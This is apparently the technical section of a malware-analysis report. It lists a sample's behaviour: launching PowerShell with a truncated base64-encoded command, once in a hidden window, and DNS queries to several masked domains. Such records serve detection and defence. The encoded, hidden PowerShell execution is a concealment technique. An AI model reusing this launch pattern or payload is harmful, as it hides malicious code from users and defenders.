Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABJAFEAQQBRAEcARABjAFgAQQBvAEQAQgA9ACcARwBaAEEARABBAEEAQQBvAEEANAAnADsAJABEAEQAQwB3AEIAdwBaAEEAIAA9AC...
- DNS ASK me####paradies.com
- DNS ASK 8h#.me
- DNS ASK ms#r.in
- DNS ASK ga#####etvalentine.fr
- DNS ASK ce###center.ir
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABJAFEAQQBRAEcARABjAFgAQQBvAEQAQgA9ACcARwBaAEEARABBAEEAQQBvAEEANAAnADsAJABEAEQAQwB3AEIAdwBaAEEAIAA9AC...' (with hidden window)